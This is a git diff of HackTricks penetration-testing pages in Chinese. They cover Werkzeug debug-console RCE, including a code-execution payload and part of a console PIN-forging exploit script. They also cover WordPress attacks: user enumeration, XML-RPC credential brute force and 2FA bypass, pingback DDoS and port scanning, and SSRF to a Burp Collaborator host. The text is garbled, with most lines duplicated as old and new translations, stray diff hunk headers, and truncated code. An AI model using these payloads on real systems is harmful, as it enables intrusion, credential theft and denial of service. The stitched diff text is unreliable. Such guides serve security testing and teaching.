* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,具有从侦察到报告的 20 多种工具和功能。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,为他们节省一些时间,深入挖掘,弹出 shell 并享受乐趣。
**即时可用的漏洞评估与渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
## 控制台 RCE
如果调试处于活动状态,您可以尝试访问 `/console` 并获 RCE。
如果调试处于活动状态,您可以尝试访问 `/console` 并获 RCE。
```python
__import__('os').popen('whoami').read();
```
![](<../../.gitbook/assets/image (117).png>)
在互联网上还有一些漏洞,比如[这个](https://github.com/its-arun/Werkzeug-Debug-RCE)或者在metasploit中的一个。
互联网上还有几个漏洞,比如[这个](https://github.com/its-arun/Werkzeug-Debug-RCE)或metasploit中的一个。
## Pin Protected - Path Traversal
## PIN保护 - 路径遍历
在某些情况下,**`/console`** 端点将受到 pin 的保护。如果您有一个**文件遍历漏洞**,您可以泄露所有必要的信息来生成该 pin
在某些情况下,**`/console`** 端点将受到PIN保护。如果您有**文件遍历漏洞**您可以泄露生成该PIN所需的所有信息
### Werkzeug Console PIN Exploit
### Werkzeug控制台PIN漏洞
强制应用程序中的调试错误页面以查看此内容:
在应用程序中强制显示调试错误页面以查看此内容:
```
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
```
在尝试访问Werkzeug的调试界面时遇到了“控制台已锁定”的情况表明需要PIN来解锁控制台。建议通过分析Werkzeug的调试初始化文件(`__init__.py`)中的PIN生成算法来利用控制台PIN。可以从[**Werkzeug源代码存储库**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py)中研究PIN生成机制,但建议通过文件遍历漏洞获取实际服务器代码,以避免潜在的版本差异。
在尝试访问 Werkzeug 的调试接口时,会遇到关于“控制台锁定”的消息,指示需要一个 PIN 来解锁控制台。建议通过分析 Werkzeug 的调试初始化文件 (`__init__.py`) 中的 PIN 生成算法来利用控制台 PIN。可以从 [**Werkzeug 源代码库**](https://github.com/pallets/werkzeug/blob/master/src/werkzeug/debug/\_\_init\_\_.py) 学习 PIN 生成机制,但建议通过文件遍历漏洞获取实际服务器代码,以避免潜在的版本差异。
要利用控制台PIN需要两组变量`probably_public_bits`和`private_bits`
要利用控制台 PIN需要两组变量`probably_public_bits` `private_bits`
#### **`probably_public_bits`**
* **`username`**:指的是启动Flask会话的用户。
* **`modname`**:通常指定为`flask.app`。
* **`getattr(app, '__name__', getattr(app.__class__, '__name__'))`**:通常解析为**Flask**。
* **`getattr(mod, '__file__', None)`**表示Flask目录中`app.py`的完整路径(例如,`/usr/local/lib/python3.5/dist-packages/flask/app.py`)。如果不适用`app.py`,请尝试`app.pyc`
* **`username`**:指发起 Flask 会话的用户。
* **`modname`**:通常指定为 `flask.app`
* **`getattr(app, '__name__', getattr(app.__class__, '__name__'))`**:通常解析为 **Flask**
* **`getattr(mod, '__file__', None)`**:表示 Flask 目录中 `app.py` 的完整路径(例如,`/usr/local/lib/python3.5/dist-packages/flask/app.py`)。如果 `app.py` 不适用,**尝试 `app.pyc`**
#### **`private_bits`**
* **`uuid.getnode()`**:获取当前计算机的MAC地址使用`str(uuid.getnode())`将其转换为十进制格式。
* 要**确定服务器的MAC地址**,必须识别应用程序使用的活动网络接口(例如`ens3`)。在存在不确定性的情况下,**泄露`/proc/net/arp`**以查找设备ID然后从**`/sys/class/net/<device id>/address`**中提取MAC地址。
* 将十六进制MAC地址转换为十进制可以按如下所示进行
* **`uuid.getnode()`**:获取当前机 MAC 地址,`str(uuid.getnode())` 将其转换为十进制格式。
* 要 **确定服务器的 MAC 地址**,必须识别应用使用的活动网络接口(例如,`ens3`)。如果不确定,**泄露 `/proc/net/arp`** 以找到设备 ID然后 **从 `/sys/class/net/<device id>/address`** 中提取 MAC 地址。
* 可以按如下方式将十六进制 MAC 地址转换为十进制:
```python
# 例如MAC地址56:00:02:7a:23:ac
# 示例 MAC 地址: 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692
```
* **`get_machine_id()`**:将`/etc/machine-id`或`/proc/sys/kernel/random/boot_id`的数据与`/proc/self/cgroup`最后一个斜杠(`/`)后的第一行连接起来。
* **`get_machine_id()`**:将 `/etc/machine-id``/proc/sys/kernel/random/boot_id` 中的数据与 `/proc/self/cgroup` 的第一行在最后一个斜杠(`/`)之后的部分连接起来。
<details>
<summary>`get_machine_id()`的代码</summary>
<summary>Code for `get_machine_id()`</summary>
```python
def get_machine_id() -> t.Optional[t.Union[str, bytes]]:
global _machine_id
@ -108,9 +109,9 @@ try:
```
</details>
整理所有必要数据后可以执行利用脚本来生成Werkzeug控制台PIN
收集所有必要数据后,可以执行漏洞利用脚本以生成 Werkzeug 控制台 PIN
整理所有必要数据后可以执行利用脚本来生成Werkzeug控制台PIN。该脚本使用组装的`probably_public_bits`和`private_bits`来创建一个哈希然后经过进一步处理生成最终的PIN。以下是执行此过程的Python代码:
收集所有必要数据后,可以执行漏洞利用脚本以生成 Werkzeug 控制台 PIN。该脚本使用组装的 `probably_public_bits``private_bits` 创建一个哈希,然后经过进一步处理以生成最终的 PIN。以下是执行此过程的 Python 代码:
```python
import hashlib
from itertools import chain
@ -156,23 +157,23 @@ rv = num
print(rv)
```
这个脚本通过对连接的位进行哈希处理,添加特定的盐(`cookiesalt` 和 `pinsalt`),并格式化输出来生成 PIN。重要的是要注意需要准确获取目标系统中 `probably_public_bits``private_bits` 的实际值,以确保生成的 PIN 与 Werkzeug 控制台预期的 PIN 匹配。
这个脚本通过对连接的位进行哈希,添加特定的盐(`cookiesalt` 和 `pinsalt`),并格式化输出,生成 PIN。需要注意的是`probably_public_bits` 和 `private_bits` 的实际值需要从目标系统准确获取,以确保生成的 PIN 与 Werkzeug 控制台预期的匹配。
{% hint style="success" %}
如果你使用的是 **旧版本** Werkzeug请尝试将 **哈希算法更改为 md5** 而不是 sha1。
如果您使用的是 **旧版本** Werkzeug请尝试将 **哈希算法更改为 md5** 而不是 sha1。
{% endhint %}
## Werkzeug Unicode 字符
正如在 [**这个问题**](https://github.com/pallets/werkzeug/issues/2833) 中观察到的Werkzeug 在头部包含 Unicode 字符时不会关闭请求。正如 [**这篇文章**](https://mizu.re/post/twisty-python) 中解释的,这可能导致 CL.0 请求走私漏洞。
正如在 [**这个问题**](https://github.com/pallets/werkzeug/issues/2833) 中观察到的Werkzeug 不会关闭带有 Unicode 字符的请求头。正如在 [**这个写作**](https://mizu.re/post/twisty-python) 中解释的,这可能导致 CL.0 请求走私漏洞。
这是因为,在 Werkzeug 中可以发送一些 **Unicode** 字符,这会导致服务器 **中断**。然而,如果 HTTP 连接是通过头部 **`Connection: keep-alive`** 创建的,请求的主体将不会被读取,连接仍将保持打开状态,因此请求的 **主体** 将被视为 **下一个 HTTP 请求**
这是因为,在 Werkzeug 中可以发送一些 **Unicode** 字符,这会导致服务器 **崩溃**。然而,如果 HTTP 连接是使用 **`Connection: keep-alive`** 头创建的,请求的主体将不会被读取,连接仍将保持打开状态,因此请求的 **主体** 将被视为 **下一个 HTTP 请求**
## 自动化利用
{% embed url="https://github.com/Ruulian/wconsole_extractor" %}
## 参考资料
## 参考文献
* [**https://www.daehee.com/werkzeug-console-pin-exploit/**](https://www.daehee.com/werkzeug-console-pin-exploit/)
* [**https://ctftime.org/writeup/17955**](https://ctftime.org/writeup/17955)
@ -181,20 +182,21 @@ print(rv)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
**即时提供的漏洞评估和渗透测试设置**。从侦察到报告运行完整的渗透测试,使用 20+ 工具和功能。我们不取代渗透测试人员 - 我们开发定制工具、检测和利用模块,让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
**即时可用的漏洞评估和渗透测试设置**。从任何地方运行完整的渗透测试,使用 20 多种工具和功能,从侦察到报告。我们不替代渗透测试人员 - 我们开发自定义工具、检测和利用模块,以便让他们有更多时间深入挖掘、获取 shell 并享受乐趣。
{% embed url="https://pentest-tools.com/" %}
{% hint style="success" %}
学习和实践 AWS 黑客攻击:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客攻击:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 **HackTricks****HackTricks Cloud** github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

238
network-services-pentesting/pentesting-web/wordpress.md
View file

@ -1,74 +1,76 @@
# Wordpress
{% hint style="success" %}
学习与实践 AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
{% endhint %}
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用[**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress)可以轻松构建和**自动化工作流程**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
今天就获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
## 基本信息
**上传**的文件位于:`http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**主题文件位于/wp-content/themes/**因此如果更改主题的某些php以获得RCE则可能会使用该路径。例如使用**twentytwelve主题**,您可以在以下位置访问**404.php**文件:[**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**另一个有用的URL可能是** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
**上传** 的文件位于: `http://10.10.10.10/wp-content/uploads/2018/08/a.txt`\
**主题文件可以在 /wp-content/themes/ 中找到,** 所以如果你更改主题的一些 php 文件以获取 RCE你可能会使用该路径。例如使用 **theme twentytwelve** 你可以 **访问** **404.php** 文件在: [**/wp-content/themes/twentytwelve/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)\
**另一个有用的 URL 可能是:** [**/wp-content/themes/default/404.php**](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
**wp-config.php**中,您可以找到数据库的根密码。
**wp-config.php** 中可以找到数据库的 root 密码。
要检查的默认登录路径:_**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
默认登录路径检查: _**/wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/**_
### **主要WordPress文件**
### **主要 WordPress 文件**
- `index.php`
- `license.txt` 包含有用的信息如安装的WordPress版本。
- `wp-activate.php` 用于设置新WordPress站点时的电子邮件激活过程。
- 登录文件夹(可能已重命名以隐藏):
- `/wp-admin/login.php`
- `/wp-admin/wp-login.php`
- `/login.php`
- `/wp-login.php`
- `xmlrpc.php` 是WordPress的一个功能文件它使数据能够通过HTTP作为传输机制和XML作为编码机制进行传输。这种通信方式已被WordPress [REST API](https://developer.wordpress.org/rest-api/reference)取代。
- `wp-content`文件夹是存储插件和主题的主目录。
- `wp-content/uploads/` 是存储上传到平台的任何文件的目录。
- `wp-includes/` 这是存储核心文件的目录如证书、字体、JavaScript文件和小部件。
- `wp-sitemap.xml` 在WordPress版本5.5及更高版本中WordPress会生成一个包含所有公共帖子和可公开查询的帖子类型和分类法的站点地图XML文件。
* `index.php`
* `license.txt` 包含有用的信息,例如安装的 WordPress 版本。
* `wp-activate.php` 用于设置新 WordPress 网站时的电子邮件激活过程。
* 登录文件夹(可能被重命名以隐藏):
* `/wp-admin/login.php`
* `/wp-admin/wp-login.php`
* `/login.php`
* `/wp-login.php`
* `xmlrpc.php` 是一个文件,代表 WordPress 的一个功能,允许通过 HTTP 作为传输机制和 XML 作为编码机制传输数据。这种类型的通信已被 WordPress [REST API](https://developer.wordpress.org/rest-api/reference) 取代。
* `wp-content` 文件夹是存储插件和主题的主要目录。
* `wp-content/uploads/` 是存储上传到平台的任何文件的目录。
* `wp-includes/` 这是存储核心文件的目录,如证书、字体、JavaScript 文件和小部件。
* `wp-sitemap.xml` 在 WordPress 版本 5.5 及更高版本中WordPress 生成一个包含所有公共帖子和可公开查询的帖子类型及分类法的 sitemap XML 文件。
**后渗透**
**后期利用**
- `wp-config.php`文件包含WordPress连接到数据库所需的信息如数据库名称、数据库主机、用户名和密码、身份验证密钥和盐以及数据库表前缀。此配置文件还可用于激活DEBUG模式这在故障排除中很有用。
* `wp-config.php` 文件包含 WordPress 连接数据库所需的信息,例如数据库名称、数据库主机、用户名和密码、身份验证密钥和盐,以及数据库表前缀。此配置文件还可以用于激活 DEBUG 模式,这在故障排除时可能很有用。
### 用户权限
- **管理员**
- **编辑者**:发布和管理自己和其他人的帖子
- **作者**发布和管理自己的帖子
- **贡献者**:编写和管理自己的帖子,但不能发布它们
- **订阅者**:浏览帖子并编辑其个人资料
* **管理员**
* **编辑者**: 发布和管理他和其他人的帖子
* **作者**: 发布和管理自己的帖子
* **贡献者**: 撰写和管理自己的帖子但不能发布
* **订阅者**: 浏览帖子并编辑他们的个人资料
## **被动枚举**
### **获取WordPress版本**
### **获取 WordPress 版本**
检查是否可以找到文件`/license.txt`或`/readme.html`
检查是否可以找到文件 `/license.txt` `/readme.html`
在页面的**源代码**中(例如来自[https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/)的示例):
在页面的 **源代码** 中(来自 [https://wordpress.org/support/article/pages/](https://wordpress.org/support/article/pages/) 的示例):
- grep
* grep
```bash
curl https://victim.com/ | grep 'content="WordPress'
```
@ -76,11 +78,11 @@ curl https://victim.com/ | grep 'content="WordPress'
![](<../../.gitbook/assets/image (1111).png>)
* CSS link files
* CSS链接文件
![](<../../.gitbook/assets/image (533).png>)
* JavaScript files
* JavaScript文件
![](<../../.gitbook/assets/image (524).png>)
@ -90,15 +92,13 @@ curl https://victim.com/ | grep 'content="WordPress'
```bash
curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
{% endcode %}
### 获取主题
{% code overflow="wrap" %}
```bash
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
```
### 提取一般版本
### 提取版本信息
{% code overflow="wrap" %}
```bash
@ -110,7 +110,7 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 可以轻松构建并由全球**最先进**的社区工具驱动的**自动化工作流程**。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
@ -119,41 +119,41 @@ curl -H 'Cache-Control: no-cache, no-store' -L -ik -s https://wordpress.org/supp
### 插件和主题
您可能无法找到所有可能的插件和主题。为了发现它们所有,您需要**主动暴力破解插件和主题列表**(幸运的是,有自动化工具包含这些列表)。
您可能无法找到所有可能的插件和主题。为了发现它们,您需要 **主动暴力破解插件和主题的列表**(希望对我们来说,有自动化工具包含这些列表)。
### 用户
**ID 暴力破解**
通过暴力破解用户ID您可以从WordPress网站获取有效用户:
您可以通过暴力破解用户 ID 从 WordPress 网站获取有效用户:
```
curl -s -I -X GET http://blog.example.com/?author=1
```
如果响应为**200**或**30X**表示id是**有效**的。如果响应为**400**则id是**无效**的。
如果响应**200****30X**,这意味着 id 是 **有效** 的。如果响应是 **400**,那么 id 是 **无效** 的。
**wp-json**
您还可以尝试通过查询获取有关用户的信息:
您还可以通过查询获取有关用户的信息:
```
curl http://blog.example.com/wp-json/wp/v2/users
```
另一个可以揭示有关用户信息的 `/wp-json/` 端点是:
另一个可以揭示用户信息的 `/wp-json/` 端点是:
```
curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
```
注意,此端点仅公开已发布帖子的用户。**仅提供启用此功能的用户的信息**。
注意,此端点仅暴露已发布帖子的用户。**仅提供启用此功能的用户的信息**。
还要注意**/wp-json/wp/v2/pages**可能会泄漏IP地址。
还要注意**/wp-json/wp/v2/pages** 可能会泄露 IP 地址。
#### 登录用户名枚举
**`/wp-login.php`**登录时,**消息**会根据指定的**用户名是否存在**而**不同**
**`/wp-login.php`** 登录时,**消息**在指示的 **用户名是否存在** 时是 **不同的**
### XML-RPC
如果`xml-rpc.php`处于活动状态则可以执行凭据暴力破解或者使用它来发动对其他资源的DoS攻击例如您可以使用[此工具](https://github.com/relarizky/wpxploit)来自动化此过程)。
如果 `xml-rpc.php` 处于活动状态,您可以执行凭据暴力破解或使用它对其他资源发起 DoS 攻击。(您可以通过[使用这个](https://github.com/relarizky/wpxploit)来自动化此过程,例如)。
要查看它是否处于活动状态请尝试访问_**/xmlrpc.php**_并发送此请求
要查看它是否处于活动状态,请尝试访问 _**/xmlrpc.php**_ 并发送此请求:
**检查**
```markup
@ -166,7 +166,7 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
**凭证暴力破解**
**`wp.getUserBlogs`**、**`wp.getCategories`**或**`metaWeblog.getUsersBlogs`**是一些可用于暴力破解凭证的方法。如果你找到任何一个,你可以发送类似以下内容
**`wp.getUserBlogs`**、**`wp.getCategories`****`metaWeblog.getUsersBlogs`** 是一些可以用来暴力破解凭证的方法。如果你能找到其中任何一个,你可以发送类似于
```markup
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
@ -176,13 +176,13 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
</params>
</methodCall>
```
一个200状态码的响应中如果凭据无效应该出现消息_"用户名或密码不正确"_。
200代码响应中,如果凭据无效,应该出现消息 _"用户名或密码不正确"_
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../.gitbook/assets/image (107) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (4) (1).png>)
![](<../../.gitbook/assets/image (721).png>)
使用正确的凭据,您可以上传一个文件。在响应中将显示路径([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
使用正确的凭据,您可以上传文件。在响应中,路径将会出现 ([https://gist.github.com/georgestephanis/5681982](https://gist.github.com/georgestephanis/5681982))
```markup
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
@ -212,18 +212,18 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
</params>
</methodCall>
```
也有一种**更快的方法**可以使用**`system.multicall`**来暴力破解凭据,因为您可以在同一请求中尝试多个凭据:
还有一种**更快的方法**可以使用**`system.multicall`**进行暴力破解凭据,因为您可以在同一请求中尝试多个凭据:
<figure><img src="../../.gitbook/assets/image (628).png" alt=""><figcaption></figcaption></figure>
**绕过双因素认证**
**绕过 2FA**
这种方法适用于程序而非人类,并且比较老旧,因此不支持双因素认证。因此,如果您拥有有效凭据但主入口受到双因素认证保护,**您可能能够滥用 xmlrpc.php 以绕过双因素认证登录**。请注意,您将无法执行通过控制台可以执行的所有操作,但您仍然可能能够 Ippsec 在 [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) 中解释的那样实现 RCE
此方法是针对程序而非人类的,并且较旧,因此不支持 2FA。因此如果您拥有有效的凭据但主要入口受到 2FA 保护,**您可能能够利用 xmlrpc.php 使用这些凭据登录,从而绕过 2FA**。请注意,您将无法执行通过控制台可以执行的所有操作,但您仍然可能能够达到 RCE正如 Ippsec 在 [https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s](https://www.youtube.com/watch?v=p8mIdm93mfw\&t=1130s) 中解释的那样。
**DDoS 或端口扫描**
如果您可以在列表中找到 _**pingback.ping**_ 方法,您可以让 WordPress 向任何主机/端口发送任意请求。\
这可用于要求**数千个** WordPress **站点**访问一个**位置**(从而在该位置引发**DDoS**),或者您可以使用它来让**WordPress**扫描一些内部**网络**(您可以指定任何端口)。
如果您可以在列表中找到方法 _**pingback.ping**_,则可以使 Wordpress 向任何主机/端口发送任意请求。\
这可以用来请求**成千上万**的 Wordpress **站点**去**访问**一个**位置**(因此在该位置造成**DDoS**)或者您可以用它让**Wordpress**去**扫描**一些内部**网络**(您可以指定任何端口)。
```markup
<methodCall>
<methodName>pingback.ping</methodName>
@ -233,11 +233,11 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
</value></param></params>
</methodCall>
```
![](../../.gitbook/assets/1_JaUYIZF8ZjDGGB7ocsZC-g.png)
![](../../.gitbook/assets/1\_JaUYIZF8ZjDGGB7ocsZC-g.png)
如果您得到的**faultCode**值**大于**017,这意味着端口是开放的。
如果你得到的 **faultCode****大于** **0** (17),这意味着端口是开放的。
查看前一节中对**`system.multicall`**的使用,了解如何滥用此方法来发动 DDoS 攻击
查看上一节中 **`system.multicall`** 的使用,了解如何利用此方法造成 DDoS
**DDoS**
```markup
@ -253,17 +253,17 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
### wp-cron.php DoS
这个文件通常存在于Wordpress站点的根目录下**`/wp-cron.php`**\
当访问这个文件时会执行一个“繁重”的MySQL **查询**,因此可以被**攻击者**用来引发**DoS**。\
此外,默认情况下,`wp-cron.php`在每次页面加载时被调用每当客户端请求任何Wordpress页面时这在高流量站点上可能会引起问题DoS
此文件通常位于Wordpress站点的根目录下**`/wp-cron.php`**\
当访问此文件时,会执行一个“**重**”的MySQL **查询**,因此可能被**攻击者**用来**造成****DoS**。\
此外,默认情况下,`wp-cron.php`在每次页面加载时被调用每当客户端请求任何Wordpress页面时在高流量网站上可能会导致问题DoS
建议禁用Wp-Cron并在主机内创建一个真正的cronjob在规律的时间间隔内执行所需的操作(而不会引起问题)。
建议禁用Wp-Cron并在主机内创建一个真正的cronjob定期执行所需的操作(而不造成问题)。
### /wp-json/oembed/1.0/proxy - SSRF
尝试访问 _https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_Wordpress站点可能会向您发出请求。
尝试访问_https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net_Wordpress站点可能会向您发出请求。
当它不起作用时的响应:
当它不起作用时的响应
![](<../../.gitbook/assets/image (365).png>)
@ -271,9 +271,9 @@ curl http://blog.example.com/wp-json/oembed/1.0/embed?url=POST-URL
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
这个工具检查**methodName: pingback.ping**和路径**/wp-json/oembed/1.0/proxy**,如果存在,它会尝试利用它们。
工具检查**methodName: pingback.ping**和路径**/wp-json/oembed/1.0/proxy**,如果存在,它会尝试利用它们。
### Automatic Tools
### 自动工具
```bash
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
@ -282,29 +282,29 @@ wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detec
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 可轻松构建并通过全球**最先进**的社区工具**自动化工作流程**。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=wordpress) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=wordpress" %}
## 通过覆盖一个位获取访问权限
## 通过覆盖一获取访问权限
这不仅仅是一个真正的攻击,而是一种好奇。在 CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) 中,您可以翻转任何 WordPress 文件的 1 位。因此,您可以翻转文件 `/var/www/html/wp-includes/user.php` 的位置 `5389`,以将 NOT (`!`) 操作变为 NOP
这不仅仅是真正的攻击,而是一种好奇。在 CTF [https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man](https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man) 中,你可以翻转任何 wordpress 文件的 1 位。因此,你可以将文件 `/var/www/html/wp-includes/user.php` 的位置 `5389` 翻转为 NOP NOT (`!`) 操作
```php
